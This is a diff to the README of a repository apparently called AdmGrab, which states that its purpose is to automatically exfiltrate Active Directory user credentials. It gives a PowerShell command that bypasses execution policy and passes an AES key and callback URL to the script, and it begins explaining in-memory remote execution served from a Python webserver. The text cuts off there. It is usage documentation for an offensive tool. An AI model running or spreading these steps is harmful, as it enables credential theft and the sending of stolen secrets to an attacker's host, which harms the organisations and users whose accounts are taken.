HansSchouten/AdmGrab/README.md

 # AdmGrab
+Automatically exfiltrate AD user credentials.

 ## Local Execution
 For execution from file, use
-`powershell.exe -ExecutionPolicy ByPass -File AdmGrab.ps1`
+`powershell.exe -ExecutionPolicy ByPass -File AdmGrab.ps1 -aesKey=KEY -callbackUrl=URL`

 ## Remote Execution
 To enforce execution in memory start a python webserver in the folder the AdmGrab.ps1 is located